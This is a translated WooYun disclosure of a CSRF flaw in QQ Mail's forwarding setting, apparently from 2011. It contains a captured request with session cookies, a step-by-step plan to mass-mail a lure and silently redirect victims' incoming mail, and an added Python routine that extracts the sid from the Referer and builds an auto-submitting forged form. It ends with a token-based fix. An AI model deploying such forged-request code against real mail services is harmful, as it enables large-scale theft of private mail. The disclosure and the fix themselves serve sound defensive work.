Vulnerability Summary (followers: 24)
Defect ID: wooyun-2011-02089
Title: Tencent Mail (QQ Mail) CSRF vulnerability
Affected vendor: Tencent
Author: Joey Yin
Submitted: 2011-05-09 16:38
Fixed: 2011-06-08 18:00
Published: 2011-06-08 18:00
Type: CSRF
Severity: High
Self-assessed Rank: 20
Status: Confirmed by vendor
Source: http://www.wooyun.org; for questions or assistance contact [email protected]
Tags: none
Vulnerability Details
Disclosure status:
2011-05-09: Details sent to the vendor, awaiting vendor action
2011-05-09: Vendor confirmed; details visible to the vendor only
2011-05-19: Details opened to core white hats and domain experts
2011-05-29: Details opened to regular white hats
2011-06-08: Details opened to intern white hats
2011-06-08: Details opened to the public
Brief description:
The same issue as the one in NetEase Mail:
http://www.wooyun.org/bugs/wooyun-2010-02088
Detailed description:
The HTTP request QQ Mail sends when the mail-forwarding setting is saved (captured from a logged-in session; note the sid parameter in both the request line and the Referer, and the autofwd=2 and fwdaddress=aaa%40aaa.cc fields in the body):
POST /cgi-bin/setting1?sid=eP6_czyZRqFmXFwR HTTP/1.1
Host: m84.mail.qq.com
Referer: http://m84.mail.qq.com/cgi-bin/setting1?sid=eP6_czyZRqFmXFwR&fun=list&loc=frame_html,,,3
Content-Length: 1022
Cache-Control: max-age=0
Origin: http://m84.mail.qq.com
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: 0.9999804222024977; pgv_flv=10.0 r22; pgv_r_cookie=1062162612608; ptcz=e521607bd7c8b2197b213e81032fbadfb27d055fe0dd77108ed16d4b0851793a; pvid=9633133315; adid=15159174; o_cookie=15159174; pt2gguin=o0015159174; uin=o0015159174; skey=@uQdcppmMJ; ptisp=; new_mail_num=15159174&5; new_mail_num_15159174=5; pgv_pvid=4829073595; pgv_info=ssid=s7231264448; qm_authimgs_id=0; qm_verifyimagesession=h0034852b3d81ba75f45f3197457d17fe558f3ac2ea1f7afcf3b4762555592ee25ab73cb6794ab0e4c6; autologin=EXPIRED; qm_flag=0; qqmail_alias=aenjoy@qq.com; sid=15159174&10e7d7b5a708bcb16412079967a2ceb2,ckPiFSOeoeww.; sid_15159174=10e7d7b5a708bcb16412079967a2ceb2,ckPiFSOeoeww.; qm_sid=10e7d7b5a708bcb16412079967a2ceb2,ckPiFSOeoeww.; qm_username=15159174; qm_domain=http://m84.mail.qq.com; qm_qz_key=1_c8447911320d03fe9e003208f3641e7e010a08030f070d050600; CCSHOW=15159174&0000; CCSHOW_15159174=0000; foxacc=15159174&0; foxacc_15159174=0; ssl_edition=m84.mail.qq.com; edition=m84.mail.qq.com; username=15159174&15159174; username_15159174=15159174; tinfo=1304929645.1452*; device=iPad; qm_ftn_key=5c5f9e6b; qm_sk=15159174&ii7T7fN7; qm_sk_15159174=ii7T7fN7; qm_ssum=15159174&721ee677518d84094e73ac845bbe5e40; qm_ssum_15159174=721ee677518d84094e73ac845bbe5e40
sid=eP6_czyZRqFmXFwR&Fun=submit&signature=%3Cbr%3E&autocontent__html=%3Cdiv%3E%D5%E2%CA%C7%C0%B4%D7%D4QQ%D3%CA%CF%E4%B5%C4%BC%D9%C6%DA%D7%D4%B6%AF%BB%D8%B8%B4%D3%CA%BC%FE%A1%A3%3C%2Fdiv%3E%0D%0A%3Cdiv%3E%26nbsp%3B%3C%2Fdiv%3E%0D%0A%3Cdiv%3E%C4%FA%BA%C3%A3%AC%CE%D2%D7%EE%BD%FC%D5%FD%D4%DA%D0%DD%BC%D9%D6%D0%A3%AC%CE%DE%B7%A8%C7%D7%D7%D4%BB%D8%B8%B4%C4%FA%B5%C4%D3%CA%BC%FE%A1%A3%CE%D2%BD%AB%D4%DA%BC%D9%C6%DA%BD%E1%CA%F8%BA%F3%A3%AC%BE%A1%BF%EC%B8%F8%C4%FA%BB%D8%B8%B4%A1%A3%3C%2Fdiv%3E&addhtml=yes&rtcheck=0&verifykey=&verifycode=&verifycode_cn=&showcount=2&defaultfontid=0&defaultsizeid=0&defaultcolor=default&listmode=3&delflag=0&selectSign=-1&wapsigncontent__txt=%B8%C3%D3%CA%BC%FE%B4%D3%D2%C6%B6%AF%C9%E8%B1%B8%B7%A2%CB%CD%0D%0A&noinclude=0&titlePrefix=1&autofwd=2&fwdaddress=aaa%40aaa.cc&fwdbackup=0&replytype=0&abstract=0&mailsize=0&weather=0&Birthday=1&todaynews=1&editor=0&addrhistory=1&txtformat=0&IsValid=0&IsWapValid=0&atcpsubject=0&autoaddaddress=0&savesendbox=0&sendmailunicode=1&QQlight=0&qqplus=0&plpopen=1
As with NetEase, there is no anti-CSRF protection on this endpoint. The only check is that the request carries the session id (sid), which the server validates. But sid is not a secret: it is a query-string parameter on every mail UI URL (see the Referer above), so any page the user opens from inside the mail interface receives it in the Referer header. With that value an attacker can forge the request above and set fwdaddress to an address under their control, so that all of the victim's incoming mail is forwarded to them.
Proof of concept:
Attack method:
1. Host a page on a third-party site that builds the POST form. The crucial sid value can be read from the HTTP Referer: when the victim opens the attacker's link from inside the mail interface, the browser sends the mail UI URL, sid included, as the Referer, and the page can fill it into the form and auto-submit.
2. Mass-mail a message containing that URL, with a subject line enticing enough to get clicks.
3. Wait for the victims' mail to arrive at the forwarding address.
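The following is an added example, not code from the report: the attacker-side server logic of steps 1 and 2. It parses the incoming Referer for the sid and answers with a self-submitting form aimed at the settings CGI on the host the victim came from. The endpoint path and the field names (sid, Fun, autofwd, fwdaddress, fwdbackup) are taken from the captured request above; keeping only this reduced set of fields, and the forwarding address passed in, are assumptions made for the demonstration.

```python
"""Added example (not from the original report): attacker-side page logic for
the CSRF described in the report.  The victim follows a link in a mail, the
mail UI URL (carrying sid=...) arrives in the Referer header, and the server
echoes back a hidden POST form targeting the forwarding setting.  Field names
come from the captured request; the reduced field set is an assumption."""
import html
import re
from typing import Optional
from urllib.parse import parse_qs, urlsplit

SID_RE = re.compile(r"[A-Za-z0-9_\-]+")


def extract_sid(referer: str) -> Optional[str]:
    """Pull the sid query parameter out of a Referer header value.
    Returns None when there is no usable sid (user came from somewhere
    else, or the browser did not send a Referer at all)."""
    if not referer:
        return None
    parts = urlsplit(referer)
    host = parts.hostname or ""
    # Only a referer from the mail frontend carries a sid worth using.
    if not (host == "mail.qq.com" or host.endswith(".mail.qq.com")):
        return None
    sid = parse_qs(parts.query).get("sid", [None])[0]
    if sid is None or not SID_RE.fullmatch(sid):
        return None
    return sid


def build_csrf_page(referer: str, forward_to: str) -> str:
    """Return the HTML the attacker's server serves: a hidden form that POSTs
    to /cgi-bin/setting1 on the same host the victim came from, with the
    victim's own sid filled in, submitted automatically on load."""
    sid = extract_sid(referer)
    if sid is None:
        # No sid: serve something harmless so the page looks innocent.
        return "<html><body>nothing here</body></html>"
    host = urlsplit(referer).hostname
    action = f"http://{host}/cgi-bin/setting1?sid={html.escape(sid)}"
    fields = {
        "sid": sid,
        "Fun": "submit",
        "autofwd": "2",           # value seen in the captured request
        "fwdaddress": forward_to,  # attacker-controlled destination
        "fwdbackup": "0",
    }
    inputs = "\n".join(
        f'<input type="hidden" name="{html.escape(k)}" value="{html.escape(v)}">'
        for k, v in fields.items()
    )
    return (
        '<html><body onload="document.forms[0].submit()">\n'
        f'<form method="POST" action="{html.escape(action)}">\n{inputs}\n</form>\n'
        "</body></html>"
    )
```

The only input the attacker needs is the Referer; everything else in the forged request is static. A browser that suppresses the Referer, or a sid that lives somewhere other than the URL, makes build_csrf_page fall through to the harmless page, which is exactly why the sid cannot serve as the CSRF token.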
Fix:
Why is everyone so lazy? An anti-CSRF token really is not much work. Sticky sessions are not an option in a distributed deployment, but the per-session token can be kept in a distributed cache that every node can reach. The token has to be unpredictable, bound to the login session, carried in the POST body rather than the URL (so it cannot leak through the Referer the way sid does), and checked before any setting is changed. Checking the Origin header the browser already sends (see the capture above) is a cheap additional defence, since a cross-site form post carries the attacker's origin.
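As an added example (not the report's code and not QQ Mail's), the fix sketched above: a per-session anti-CSRF token stored in a shared cache so that any application node can validate it without sticky sessions. SharedCache is a plain dict standing in for memcached, Redis or similar; the request and response shapes of handle_setting_post are simplified assumptions.

```python
"""Added example (not part of the report or of the vendor's code): per-session
anti-CSRF token kept in a store every application node can reach.
SharedCache is a dict standing in for a distributed cache."""
import hmac
import secrets
from typing import Dict, Optional


class SharedCache:
    """Stand-in for a distributed cache: all nodes see the same entries, so a
    token issued by node A validates on node B without sticky sessions."""

    def __init__(self) -> None:
        self._d: Dict[str, str] = {}

    def get(self, key: str) -> Optional[str]:
        return self._d.get(key)

    def set(self, key: str, value: str) -> None:
        self._d[key] = value


CACHE = SharedCache()


def issue_csrf_token(session_id: str) -> str:
    """Called when rendering the settings form.  One random token per login
    session, stored server-side under the session id and embedded in the
    form body (never in the URL, so it cannot leak through Referer)."""
    key = f"csrf:{session_id}"
    token = CACHE.get(key)
    if token is None:
        token = secrets.token_urlsafe(32)
        CACHE.set(key, token)
    return token


def validate_csrf(session_id: str, submitted: Optional[str]) -> bool:
    """Called on the state-changing POST.  A token must exist for this
    session and match the submitted one; compare in constant time."""
    expected = CACHE.get(f"csrf:{session_id}")
    if expected is None or submitted is None:
        return False
    return hmac.compare_digest(expected, submitted)


def handle_setting_post(session_id: str, form: Dict[str, str]) -> str:
    """Model of the settings handler: reject before touching any setting.
    session_id is whatever the authenticated session cookie resolves to."""
    if not validate_csrf(session_id, form.get("csrf_token")):
        return "403 Forbidden: missing or invalid anti-CSRF token"
    # Apply autofwd / fwdaddress changes here in the real handler.
    return f"200 OK: forwarding set to {form.get('fwdaddress', '')}"
```

The attacker's page from the proof of concept cannot obtain csrf_token: it is only ever rendered into the settings form on the mail origin, and a third-party page cannot read that response, so the forged POST stops at the 403.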
Copyright notice: please credit Joey Yin@乌云 (WooYun) when reproducing.
Vulnerability Response
Vendor response:
Severity: Low
Rank: 2
Confirmed: 2011-05-09 19:37
Vendor comment:
thanks
Latest status:
None